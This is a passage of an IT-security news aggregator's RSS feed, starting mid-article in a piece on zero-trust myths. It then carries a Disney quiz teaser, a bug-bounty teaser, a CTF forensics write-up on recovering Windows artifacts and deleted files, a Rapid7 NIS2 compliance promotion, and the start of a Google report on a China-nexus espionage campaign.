<p><a href="https://www.accenture.com/content/dam/accenture/final/accenture-com/document-3/State-of-Cybersecurity-report.pdf#zoom=40" target="_blank" rel="noreferrer noopener">Accenture</a> reports that 88% of organizations have encountered significant challenges implementing zero trust. In a recent <a href="https://www.gartner.com/en/newsroom/press-releases/2024-04-22-gartner-survey-reveals-63-percent-of-organizations-worldwide-have-implemented-a-zero-trust-strategy" target="_blank" rel="noreferrer noopener">Gartner</a> survey, 35% of respondents who indicated that they either attempted or partially attempted a zero-trust initiative suffered failures that adversely affected their organization. “Gartner has observed numerous instances of failed zero-trust initiatives among end users who lacked a strategic and measurable plan,” the report says.</p>



<p>At last year’s DefCon 33 conference, U.K. security researchers from AmberWolf <a href="https://www.networkworld.com/article/4039042/def-con-research-takes-aim-at-ztna-calls-it-a-bust.html" target="_blank">poked holes in zero trust</a> by identifying potential vulnerabilities in zero-trust network access (ZTNA) offerings from three vendors. “It turns out there are no magic ZTNA beans; we’ve got the same old bug classes reimagined for a new technology stack,” said AmberWolf researcher Richard Warren. “Rather than zero trust, we’re actually putting a lot of trust into these vendors to process our data securely.”  </p>



<p><a href="https://www.linkedin.com/in/mjhaber/">Morey Haber</a>, author and chief security advisor at BeyondTrust, sums up the state of zero trust in 2026 this way: “We all agree: zero trust is necessary. But it’s been hard to implement.” Haber describes the gap between intention and execution as “massive” during a <a href="https://www.computerworld.com/video/4084071/is-zero-trust-failing-or-just-misunderstood.html" target="_blank">Today in Tech episode</a> focused on whether zero trust is failing or just misunderstood. “It doesn’t matter what you read or which framework you follow,” Haber said during the podcast. “The core issue is that we have a concept with principles and tenets, but not enough guidance on how to implement it.”</p>



<p>Here are some myths and misconceptions associated with zero trust, as well as tips on how to avoid the pitfalls and successfully implement zero trust.</p>



<h2 class="wp-block-heading">Myth: Zero trust is a product</h2>



<p>Even after 15 years, there is still considerable confusion about what zero trust is. It answers to many definitions—strategy, philosophy, concept, mindset, and architecture.</p>



<p>Chase Cunningham<em>, </em>who bills himself as <a href="https://www.drzerotrust.com/" target="_blank" rel="noreferrer noopener">DrZeroTrust</a>, says,”Security is not a product, but a combination of strategy, process, and execution. Zero trust is not just an architecture—it’s a mindset. There is no zero-trust product, period.”</p>



<p>Haber agrees. “You have vendors claiming to sell “zero-trust” products, which is misleading. There’s no such thing as a zero-trust product. Products implement security controls, but they don’t embody zero-trust principles.”</p>



<p>He cautions, “If a vendor says, ‘This remote access solution achieves zero-trust principles,’ that’s great, but I have yet to see one that delivers more than 10%-15% of the required controls.”</p>



<p>Gartner adds, “The concept of zero trust is a security approach that organizations adopt to mitigate access risks associated with networks, applications, and associated data. This is frequently overshadowed by vendor marketing, which tends to promise high expectations but often delivers suboptimal results.”</p>



<h2 class="wp-block-heading">Myth: Zero trust is a technology</h2>



<p><a href="https://www.utsystem.edu/offices/information-security/chief-information-security-officer" target="_blank" rel="noreferrer noopener">George Finney</a>, CISO at the University of Texas and author of two books on zero trust, tells <em>Network World</em> that zero trust is not a technology; in other words, it’s not micro-segmentation to block lateral movement by attackers; it’s not policy-based identity to control who gets access to enterprise resources. Those are tools and tactics that help implement zero trust.</p>



<p>Zero trust at its core is a way of thinking about risk that requires breaking down silos among security teams, networking groups, business units, compliance, and risk management functions, according to Finney.</p>



<p>The first pillar of zero trust, as defined by Kindervag, is identifying the highest-priority protect surfaces in the organization. Kindervag says that unless the organization has a clear understanding of what the crown jewels are, there’s no way a zero-trust project can be successful. Kindevag adds that IT doesn’t necessarily know what those high-value protect surfaces are, but business leaders do, and that’s where a zero-trust initiative should start.</p>



<p>The second pillar of zero trust is to map transaction flows associated with those mission-critical protect surfaces. Again, this requires coordination and collaboration with teams running key enterprise applications. This is particularly important in today’s multi-cloud environments, where a specific business process can span on-prem, edge, cloud, containers, microservices, etc.</p>



<p>“It’s not a technology issue at the end of the day that makes it hard,” Finney says. It’s people issues, cultural issues, and politics. He recommends that organizations think holistically about securing sensitive data across all attack surfaces, including endpoints, remote users, IoT devices, LLMs, AI agents, etc.</p>



<p>Gartner adds, “It is not a product or technology-focused exercise but rather a methodology driven by the organization’s overall objective and priorities.”</p>



<h2 class="wp-block-heading">Myth: Zero trust is expensive  </h2>



<p>Finney says zero trust does not have to break the bank. “A lot of folks think it’s going to be too expensive, but it doesn’t have to be,” he adds. Here are key steps on the road to zero trust that don’t involve buying anything<strong>.</strong></p>



<p><strong>Identifying high-value protect surfaces. </strong>This requires thinking like an attacker and pinpointing the assets that an attacker is most likely to consider valuable. Finney adds, “In a given protect surface, you might have multiple controls that all have to be working together to remove those trust relationships.”  </p>



<p><strong>Creating a zero-trust team</strong>. Finney says most organizations already have governance, risk management, and compliance teams that can be brought into a comprehensive zero-trust task force that includes security and networking groups. Gartner adds, “A zero-trust strategy must be initiated at the executive level and integrated across all departments and teams.”</p>



<p><strong>Education. </strong>Education is critical, says Finney. “It’s helping folks see the big picture. It gets people out of their silos.”Finney adds that a major challenge is political, having to deal with a fragmented organization in which many stakeholders are dismissive of security because it’s not what they’re measured on. For example, application developers who are under the gun to get software out the door aren’t necessarily incentivized to bake security into their processes. <strong> </strong></p>



<p><strong>Creating a strategy. </strong>“When I talk to boards of directors, they understand that to be successful in any part of the business, you need to have a strategy. That resonates from the top,” says Finney. <strong></strong></p>



<p>In its analysis of why zero-trust initiatives fail, Gartner says, “The lack of a business-aligned strategic plan has led to ineffective governance, miscommunication, poor risk management, minimal budget allocation, poor execution of the organizational security objectives, and inefficient use of limited resources.”</p>



<p><strong>Defining an architecture: </strong>Every organization is different, so there is no boilerplate architecture that can be applied everywhere. Organizations need to write a specific architecture that fits their business needs, their level of risk tolerance, their specific vertical industry, and their unique technology infrastructure.</p>



<p><strong>Setting and applying policies. </strong>Again, there is no line item associated with writing access control and identity management policies.  </p>



<p><strong>Leveraging existing tools.</strong> It’s important to realize that nobody is starting from zero.</p>



<p>Most organizations already have multi-factor authentication or single sign-on in place, they already have identity management, network management, web application firewalls, etc. The key is to integrate and align existing technology and identify gaps where new tools might be needed.</p>



<p>Speaking to AmberWolf’s point that attackers can always find bugs in vendor software, zero-trust advocates counter that zero trust implies defense in depth. So, even if there’s a flaw that allows an attacker to gain end-user credentials and access the network, there will be multiple security controls in place, such as incident detection, micro-segmentation, monitoring of end-user sessions, and controls that prevent access to and exfiltration of sensitive data.</p>



<h2 class="wp-block-heading">Myth: Zero trust is difficult to implement</h2>



<p>Zero trust doesn’t have to be hard to implement if organizations follow widely disseminated guidance provided by <a href="https://nvlpubs.nist.gov/nistpubs/specialpublications/NIST.SP.800-207.pdf" target="_blank" rel="noreferrer noopener">NIST</a>, numerous books, webinars, podcasts, experts, consultants, and more.</p>



<p>Finney recommends starting small and showing quick wins. Zero trust can’t be implemented all at once across a large organization; it requires a targeted, methodical strategy.</p>



<p>The preferred approach is to start with those high-value protect surfaces and apply tools that support the overall architecture in a coordinated, consistent, managed, and monitored fashion.  </p>



<p>“An overall strategy can deploy different tactics,” Finney says. “You want to think about what will have the biggest impact on your organization today.” He says organizations need to make informed data-driven decisions based on logs, metrics, and other data, while factoring in an analysis of what attackers are doing vs. the specific vulnerabilities and weak points in the organization’s defenses.</p>



<p>Gartner states: “Narrowing the scope of initiatives or projects within the zero-trust program is essential for attaining a zero-trust posture within practical and reasonable timeframes. Organizations define overly expansive future target states by incorporating an excessive number of systems, applications, use cases, or datasets in the initial phase—or by proposing overly intricate and granular policy sets. They will encounter scalability and cost challenges, along with extended project timelines.”</p>



<h2 class="wp-block-heading">Myth: AI breaks ZTNA</h2>



<p>Enterprises are racing to deploy generative AI and unleash semi-autonomous AI agents. This new world of black box large language models (LLM) and non-human identities (NHI) raises concerns that zero trust is an outdated strategy that’s not up to the challenge.</p>



<p>Leading zero-trust proponents are pushing back, however, arguing that the core principles still apply. “With AI, zero trust is more important than ever,” says Finney. “Zero trust is a strategy; we don’t change the strategy because AI came out. AI proves how important that strategy is.”</p>



<p>“AI is not magic,” he adds. “We secure it the same way we secure everything else. We integrate it into the tech stack and monitor it.”</p>



<p>Kindervag, currently chief evangelist at Illumio, concurs. “AI doesn’t change the fundamentals of zero trust. It reinforces them. Zero trust is the strategy that allows you to safely embrace AI. Without strict segmentation, policy enforcement, and control over data flows, AI becomes another soft and chewy center waiting to be exploited.” He adds, “You don’t need a new security strategy for AI. You just need to apply the right one. That’s zero trust.”</p>



<h2 class="wp-block-heading">Myth: There’s no way to measure success</h2>



<p>Any project that seeks support from the board and C-suite, needs to be able to justify itself through some sort of metrics. Zero trust is no exception, but how do you measure “not getting hacked?”</p>



<p>Gartner says teams should use outcome-driven metrics that link zero-trust initiatives directly to business objectives.“It’s crucial to focus on schedule adherence, cost discipline, and control effectiveness,” says Gartner. “Focus on outcomes like reduced breach incidents, improved compliance rates, and enhanced operational efficiency. Additionally, identify specific risks, such as lateral movement, data breaches, account takeovers, and insider threats, which are essential to drive value, and organizations can better justify investments and drive continuous improvement.”</p>



<h2 class="wp-block-heading">Myth: Zero-trust projects have a completion date</h2>



<p>Zero trust is more about the journey than the destination,” Finney says. He points out that organizations are constantly growing and changing. At the same time, attackers are evolving. “Zero trust is a strategy. You’re never done with a strategy,” he adds.</p>



<p>Kindervag’s final pillar of zero trust is to monitor and maintain. In other words, organizations need to be actively monitoring to make sure that access control policies are not being violated. And the zero-trust implementation needs to keep pace with changing business needs.</p>



<p>And since zero trust calls for organizations to focus on the highest value protect surfaces first, there are always additional protect surfaces that can be added under the zero-trust umbrella.</p>



<p>When Finney looks back on how things have evolved over the past 15 years, he is encouraged by the fact that tools have improved dramatically. Teams can now apply AI and machine learning to functions like anomaly detection or incident detection and response. And there are now ways to automate tasks like networking monitoring or policy enforcement.</p>



<p>“Overall, I’m feeling guardedly optimistic,” Finney says, “but the work is not done. We need to continue to make strides.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This is where magic gets real — can you ace our 30 question ultimate Disney quiz on Mickey, Marvel, Star Wars and more?]]></title>
<description><![CDATA[A big fan of everything Disney? Take this 30-question quiz on its movies, shows, characters, games and parks to prove it.]]></description>
<link>https://tsecurity.de/de/3601168/it-nachrichten/this-is-where-magic-gets-real-can-you-ace-our-30-question-ultimate-disney-quiz-on-mickey-marvel-star-wars-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601168/it-nachrichten/this-is-where-magic-gets-real-can-you-ace-our-30-question-ultimate-disney-quiz-on-mickey-marvel-star-wars-and-more/</guid>
<pubDate>Tue, 16 Jun 2026 11:02:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A big fan of everything Disney? Take this 30-question quiz on its movies, shows, characters, games and parks to prove it.]]></content:encoded>
</item>
<item>
<title><![CDATA[Bug Bounty Bootcamp #45: Token?]]></title>
<description><![CDATA[You found a password reset that leaks the magic token in the API response. Or worse — the devs left an endpoint that just gives you…Continue reading on InfoSec Write-ups »]]></description>
<link>https://tsecurity.de/de/3600906/hacking/bug-bounty-bootcamp-45-token/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600906/hacking/bug-bounty-bootcamp-45-token/</guid>
<pubDate>Tue, 16 Jun 2026 09:09:22 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://infosecwriteups.com/bug-bounty-bootcamp-45-token-2b606811c7ba"><img src="https://cdn-images-1.medium.com/max/1774/1*lOPgBd-erjmXUZqMC2XD5A.png" width="1774"></a></p><p class="medium-feed-snippet">You found a password reset that leaks the magic token in the API response. Or worse — the devs left an endpoint that just gives you…</p><p class="medium-feed-link"><a href="https://infosecwriteups.com/bug-bounty-bootcamp-45-token-2b606811c7ba">Continue reading on InfoSec Write-ups »</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CAT Reloaded CTF — CATF 2025  — DFIR Challenges]]></title>
<description><![CDATA[CAT Reloaded CTF — CATF 2025–DFIR ChallengesHappy to share with you my writeup for solving 4 DFIR challenges out of 5 (last chall has 0 solves💀) in CAT Reloaded CTF — CATF 2025.You can read this writeup on my GitBook account LinkChallenge 1 “Index of Secrets”:from the challenge description, we ne...]]></description>
<link>https://tsecurity.de/de/3600903/hacking/cat-reloaded-ctf-catf-2025-dfir-challenges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600903/hacking/cat-reloaded-ctf-catf-2025-dfir-challenges/</guid>
<pubDate>Tue, 16 Jun 2026 09:09:19 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>CAT Reloaded CTF — CATF 2025–DFIR Challenges</h3><p>Happy to share with you my writeup for solving 4 DFIR challenges out of 5 (last chall has 0 solves💀) in CAT Reloaded CTF — CATF 2025.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2NuBauFplUIXaFAO6NmKPw.jpeg"></figure><blockquote>You can read this writeup on my GitBook account <a href="https://prankster.gitbook.io/prankster/ctf-writeups/cat-reloaded-ctf-catf-2025-dfir-challenges">Link</a></blockquote><p>Challenge 1 “<strong>Index of Secrets</strong>”:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/497/1*RcAipt4ar6kUWr7eeSjrlA.png"></figure><p>from the challenge description, we need to fetch windows search database which resides in the following path:<br><em>“C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb”<br>“</em><strong><em>Windows.edb</em></strong>” is a database file used by the Windows Search service to<br>store its index of your files, emails, and other content, allowing for faster searches.</p><p>we need to download “<strong>Win Search DB Analyzer</strong>” from this <a href="https://github.com/moaistory/WinSearchDBAnalyzer/releases/tag/1.0.0.6"><strong><em>link</em></strong></a> to be able to open “<strong>Windows.edb</strong>” file, locate windows.edb and open it</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/454/1*yyH8qIWzypSz2w3MVBNQqA.png"></figure><p>a little walk around the files, we will find the “<strong><em>flag.txt.txt</em></strong><em>”</em> with absolute path = “<strong>C:\Users\wh1pl4sh\Desktop\flag.txt.txt</strong>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/797/1*EdrrnZGuUZDi-xZ1gIWciA.png"><figcaption><strong>SOLVED!!!</strong></figcaption></figure><pre>CATF{ESE_DB_F0r3ns1cs}</pre><p>Challenge 2 “<strong>Loser</strong>”<strong>:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/490/1*2fFq4Ib7YIyYyAhzu_pgbQ.png"></figure><p>we need to investigate the disk, trying to find any interesting log file that can lead us to that game crack.</p><p>while walking around, found these 3 files in the following path : “<strong>C\Windows\AppCompat\pca</strong>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/624/1*e05gYxt6h4KRCU6Ydrugiw.png"></figure><p><strong>Program Compatibility Assistant</strong> “<strong>Pca</strong>” (a Windows feature that monitors applications for issues like crashes, compatibility problems, or suspicious behavior).</p><p>PcaAppLaunchDic.txt specifically recording application paths and their last execution times.</p><p>PcaGeneralDb0.txt and PcaGeneralDb1.txt: These files store more general data related to the PCA's operation, with new files created as needed.</p><p>So, let’s dig deeper into them, trying to find something catchy.</p><p>After a lot of scrolling and scrolling here are my findings:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZG3J0vPBd1iWY2UpLOSCuQ.png"><figcaption><strong>PcaAppLaunchDic.txt</strong></figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*d8gs1k4EyDHL-4k9wwCqlg.png"><figcaption><strong>PcaGeneralDb0.txt</strong></figcaption></figure><p>now we need to construct the correct flag from this flag example:</p><pre>Flag Example: CATF{X:\Users\blabla\blabla.exe_N_YYYY-MM-DD HH:MM:SS.sss}</pre><p>full path <strong>→</strong> “<strong><em>C:\Users\t0orf3n\AppData\Local\Temp\GreenHell.crack.exe</em></strong><em>”</em></p><p>run status <strong>→</strong> “<strong><em>3</em></strong><em>”</em> (<strong>PcaGeneralDb0.txt</strong>)</p><p>last time of execution <strong>→ </strong>“<strong><em>2025-07-12 13:34:17.726</em></strong>” (<strong>PcaAppLaunchDic.txt</strong>)</p><pre>CATF{C:\Users\t0orf3n\AppData\Local\Temp\GreenHell.crack.exe_3_2025-07-12 13:34:17.726}</pre><p>Challenge 3 “<strong>Dead Icons Speak</strong>”:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/444/1*mzGN-fCfqF0odKRKtCrNsQ.png"></figure><p>from the description he said “a<strong><em>n icon rendered into the depths of a forgotten cache</em></strong>”</p><p>so we need to point directly to <strong>Windows icon/thumbnail cache</strong>.</p><p>so need to download thumbcache viewer via this <a href="https://thumbcacheviewer.github.io/"><strong><em>link</em></strong></a><strong><em> </em></strong>to open icons/thumbnails cached databases, which can be found in this path:<br>C:\Users\&lt;user&gt;\AppData\Local\Microsoft\Windows\Explorer\iconcache_xx.db</p><p>C:\Users\&lt;user&gt;\AppData\Local\Microsoft\Windows\Explorer\thumbcache_x.db</p><p>The description said “<strong>an icon rendered”</strong> , so focus on any “<strong><em>iconcache_xxx.db</em></strong>” files only!!<br>(because there’s a fake flag in a thumbcache file “<strong><em>thumbcache_256.db</em></strong>”)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pFoVlQubMv7jBU97_qmEhg.png"><figcaption><strong>FAKE FLAG!!!</strong></figcaption></figure><p>that’s a fake flag, so let’s open all “<strong><em>iconcache_xxx.db</em></strong>” files to find the correct flag.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nGG0hBhYxsPKgq44oj8MFQ.png"><figcaption><strong>Found in “<em>iconcache_256.db</em>”</strong></figcaption></figure><p>Now we got the second part of the full flag.</p><p>Let’s open the hard drive content on FTK Imager, to get the malicious exe file that wasn’t logged , wasn’t scanned, and it didn’t survive.</p><p>the only log file i found is <strong>MPLog-20250704-153812.log </strong>file, which is the “<strong><em>Microsoft Protection Log used by Windows Defender for security event analysis.</em></strong>” here’s the full path of the log file:</p><p>C:\All Users\Microsoft\Windows Defender\Support\<strong>MPLog-20250704-153812.log</strong></p><p>in FTK Imager, search for any “<strong>.exe</strong>” file, and see if there’s anything catchy:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Hz_adSuKfvK23w5Ed1XVIA.png"></figure><p>we can view that there’s a file called “<strong><em>flagstealer.exe</em></strong>” on <strong><em>wh1pl4sh’s </em></strong>desktop.</p><p>Now we got the full flag correctly</p><pre>CATF{flagstealer.exe:thumbn41l_pwn}</pre><p>Challenge 4 “<strong>Erased Traces</strong>”:</p><h4>The easy yet the difficult Challenge</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/496/1*rp_BnNcjkX9SFR_Uohxglg.png"></figure><p>Solving this challenge almost drove me crazy. opening the hard image on FTK Imager, we can easily detect 4 deleted files that need to be recovered. (hard image was too small, so finding these deleted files wasn’t challenging)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/574/1*61Z7Y94ZTRT2riY12JrpXw.png"><figcaption><strong>open with FTK Imager</strong></figcaption></figure><p>Now we need to do file carving on the disk, to restore files correctly.</p><p>Here’s all tools i used that didn’t work properly to recover the deleted files correctly:</p><ol><li>photorec</li><li>scalpel</li><li>winfr (Windows File Recovery)</li><li>MyRecover</li><li>recuva</li><li>etc…</li></ol><p>i was so close to giving up.</p><p>i know that <strong>recuva </strong>is almost the best tool to recover deleted files (as i always use it personally). file was irrecoverable as you can see, and i tried to recover them, but i got 4 files full of null bytes🫠</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BhiTTk5mA3y8u2x0WRlzdQ.png"></figure><p><strong>NOTE</strong>: most tools need the image disk to be mounted to do file carving correctly, so we’ll use Arsenal Image Mounter to mount that image “download <a href="https://arsenalrecon.com/downloads"><strong>link</strong></a>”, just a few easy clicks to mount the image file.</p><p>before giving up, I tried to see if there is a powerful tool instead of “recuva”, or “recuva professional”, so i found this amazing reddit post that answered my question. “<a href="https://www.reddit.com/r/datarecovery/comments/11cm6bd/how_to_recover_unrecoverable_files_from_usb_drive/"><strong>link</strong></a>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/744/1*ujEB5zGf97bUTt0JVlFTnw.png"><figcaption><strong>Disk Drill</strong></figcaption></figure><p>just download Disk Drill from this <a href="https://www.cleverfiles.com/data-recovery-software.html"><strong>link</strong></a>, we can attach the disk image</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/232/1*lTi2DrShQxX-knEI_GWpeA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ICwpYmrpEoA8OFuZGTleGw.png"></figure><p><strong>Search for lost data → Universal Scan,</strong> “after scan finished” → <strong>review found items</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KbFeYAis8wyYrJnqj9rICw.png"></figure><p>check yes on “<strong>hide duplicates</strong>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/267/1*oQjlSqyensUGTm9Co7rDmw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_FOxoHXjnrYPYZGAbOindg.png"></figure><p>check 4 deleted files and recover them (CAT1, CAT2, CAT3, CAT4)</p><p>hop on HxD “download <a href="https://mh-nexus.de/en/downloads.php?product=HxD20"><strong><em>link</em></strong></a>”, to check if file data still null or not🫠</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/614/1*N3yWdYF60d0d0Lxx64-sow.png"><figcaption><strong>CAT1</strong></figcaption></figure><p>FINALLY, PDF magic bytes found in CAT1!!</p><p>Now let’s view last hex values for CAT4 file:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/618/1*Bqv9etdqjMUhYwgQVLuFDQ.png"><figcaption><strong>CAT4</strong></figcaption></figure><p>Now we can see that CAT1 has first magic bytes for a PDF file<br>and CAT4 has EOF marker for (End Of File), now we know that all 4 files are actually one PDF file, but divided into 4 files.</p><p>construct them easily using very simple piece of powershell code:</p><pre>Get-Content CAT1, CAT2, CAT3, CAT4 -Encoding Byte -ReadCount 0 | Set-Content combined.pdf -Encoding Byte</pre><p>now we can open the final PDF file to get the flag:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*x2akwSBXTD_TisRBgfu6hw.png"></figure><pre>CATF{whip1@$h_iz_da_b3$t_m0v13_3va!}</pre><h4>Thanks For Reading, Hope u enjoyed ❤</h4><p>Keep in touch with me via:</p><p><a href="https://www.linkedin.com/in/loay-salah"><strong>LinkedIn</strong></a></p><p><strong>Discord</strong>: prankster99</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=ff403f100504" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/cat-reloaded-ctf-catf-2025-dfir-challenges-ff403f100504">CAT Reloaded CTF — CATF 2025  — DFIR Challenges</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Does Your Security Programme Align With NIS2 Requirements?]]></title>
<description><![CDATA[If your organization operates in the EU, or works with organizations that do, NIS2 is no longer something on the horizon. It is here and it applies to a far wider range of sectors than its predecessor, the original NIS Directive (Directive (EU) 2016/1148), and it comes with real consequences for ...]]></description>
<link>https://tsecurity.de/de/3599917/it-security-nachrichten/does-your-security-programme-align-with-nis2-requirements/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599917/it-security-nachrichten/does-your-security-programme-align-with-nis2-requirements/</guid>
<pubDate>Mon, 15 Jun 2026 19:57:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>If your organization operates in the EU, or works with organizations that do, NIS2 is no longer something on the horizon. It is here and it applies to a far wider range of sectors than its predecessor, the original NIS Directive (Directive (EU) 2016/1148), and it comes with real consequences for organizations that cannot demonstrate they are meeting its requirements. The good news? You do not have to figure out how to approach it alone.</span></p><p><span>Rapid7 has developed a dedicated NIS2 resource page that shows how the Command Platform can support key technical and operational aspects of NIS2 readiness, highlights common security program gaps, and explains where our solutions can help strengthen visibility, prioritization, detection, and reporting readiness. It is not a substitute for the broader organizational, legal, and governance measures the directive also requires, but it can be a useful starting point if you are evaluating your security capabilities and want a clearer picture of where tooling can support your approach. If you are in the early stages of assessing readiness, or further along and looking for a clearer view of the technical side, it is worth 10 minutes of your time.</span></p><h2>What are the NIS2 requirements organizations need to meet?</h2><p><span>NIS2, formally Directive (EU) 2022/2555, expands the scope of EU cybersecurity regulation significantly. More sectors are covered,the requirements are more demanding, and, crucially, the expectations have shifted from "do you have policies in place?" to "can you demonstrate that your controls actually work, continuously?".</span></p><p><span>Article 21 mandates specific risk-management measures, including risk analysis, incident handling, business continuity, supply chain security, vulnerability handling, access control, and policies regarding the use of cryptography and encryption.. Article 23 introduces strict incident reporting timelines: an early warning within 24 hours, a full notification within 72 hours, and a detailed report within one month of a significant incident.</span></p><p><span>For many security teams, these timelines necessitate a shift in operational readiness. Timely and accurate incident reporting requires pre-established detection workflows, investigation processes, and contemporaneous documentation practices to be in place prior to an incident..</span></p><p><span>NIS2 also raises the stakes at a leadership level. Executive accountability for cybersecurity is now formalised. This is not just a technical team problem. It is a governance issue that touches CISOs, boards, and senior leadership across every in-scope organization.</span></p><h2>Why traditional compliance approaches fall short of NIS2</h2><p><span>Many security programs were designed around a different set of expectations. Periodic vulnerability scans.,annual audits, and compliance reports that reflected a moment in time rather than ongoing operational health.</span></p><p><span>NIS2 necessitates a move toward continuous, defensible risk management. This involves maintaining comprehensive asset visibility, identifying threat-aware exposures with high likelihood of exploitability, and validating the effectiveness of detection capabilities to support regulatory reporting requirements..</span></p><p><span>It is a meaningful operational shift, and it is exactly the kind of shift where having the right platform and the right partner matters.</span></p><h2>How does Rapid7 support NIS2 compliance?</h2><p><span>Rapid7 views NIS2 as an operational readiness challenge. The objective is to assist organizations in transitioning from periodic compliance assessments to continuous resilience: a sustained, measurable security posture designed to support regulatory alignment and strengthen defense-in-depth against emerging threats. The platform integrates exposure management, vulnerability management, cloud security, SIEM, and managed detection and response to provide broad support for the core requirements of Article 21 within a unified, connected view of risk..</span></p><p><span>That means organizations can move from scattered, point-in-time security activity to continuous visibility, threat-informed prioritization, faster incident workflows, and the kind of evidence and reporting that NIS2 and regulators actually demand.</span></p><p><span>A few areas where this makes a real difference:</span></p><h3><span>Knowing what you are actually exposed to</span></h3><p><span>Rapid7 is positioned as a Leader in the 2025 Gartner® Magic Quadrant™ for Exposure Assessment Platforms, a technology category fundamental to the Continuous Threat Exposure Management (CTEM) framework, which supports the proactive risk-management objectives of NIS2. Surface Command provides centralized visibility across internal and external environments, supporting the identification of unmanaged assets, shadow IT, and security control gaps that may otherwise remain undetected. Exposure Command utilizes active risk scoring and attack path analysis to identify and prioritize exposures based on reachability and threat context, helping teams focus remediation efforts on high-impact risks.</span></p><h3><span>Responding and reporting faster</span></h3><p><span>Rapid7's SIEM and MDR capabilities are designed to support the detection, investigation, and reporting speed necessitated by NIS2. 24/7 monitoring and managed response facilitate the capture of essential telemetry and investigation trails within the SIEM, streamlining the evidence collection process for regulatory reporting.</span></p><h3><span>Demonstrating that controls work</span></h3><p><span>NIS2 is not satisfied by a list of tools you have purchased. It wants evidence that your controls are effective. Rapid7 provides continuous risk scoring, detection metrics, and audit-ready reporting that translates security activity into governance-ready language for leadership and regulators.</span></p><h2>Where to go next for NIS2 readiness</h2><p><span>This post covers the highlights, but Rapid7's NIS2 resource page goes much deeper.</span></p><p><span>It walks through each of Article 21's requirements in plain language, maps them to specific Rapid7 capabilities, and shows how the platform supports risk analysis... MFA monitoring, and technical assessment of cryptographic configurations. Whether you are a CISO seeking a strategic overview, a security manager evaluating technical controls, or a compliance lead mapping regulatory requirements to platform capabilities, our guidance is designed to support your objectives. NIS2 is operational; your approach to resilience should be as well. NIS2 is operational and your readiness should be too.</span></p><p><span>See how Rapid7 </span><a href="https://www.rapid7.com/solutions/compliance/nis2" target="_self"><span>supports NIS2 compliance here</span></a><span>. </span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Public and Private Medical Community Targeted by China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, and National Defense Research]]></title>
<description><![CDATA[Google Threat Intelligence Group (GTIG) has identified a sophisticated campaign attributed to UNC6508, a People's Republic of China (PRC)-nexus threat actor, targeting institutions in the North American academic, medical, and military research community. While remaining undetected for over a year...]]></description>
<link>https://tsecurity.de/de/3599547/it-security-nachrichten/public-and-private-medical-community-targeted-by-china-nexus-threat-actor-pursuing-artificial-intelligence-cyber-medical-and-national-defense-research/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599547/it-security-nachrichten/public-and-private-medical-community-targeted-by-china-nexus-threat-actor-pursuing-artificial-intelligence-cyber-medical-and-national-defense-research/</guid>
<pubDate>Mon, 15 Jun 2026 17:25:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p><span>Google Threat Intelligence Group (GTIG) has identified a sophisticated campaign attributed to UNC6508, a People's Republic of China (PRC)-nexus threat actor, targeting institutions in the North American academic, medical, and military research community. While remaining undetected for over a year, the threat actor compromised externally facing web applications, deployed bespoke malware, pivoted to sensitive internal systems, and abused enterprise administrative tools for covert data exfiltration. The threat actor had broad collection aspirations, including sensitive defense intelligence related to national security, Indo-Pacific command operations, artificial intelligence, uncrewed vehicle systems, cyber offensive programs, and medical research. </span></p>
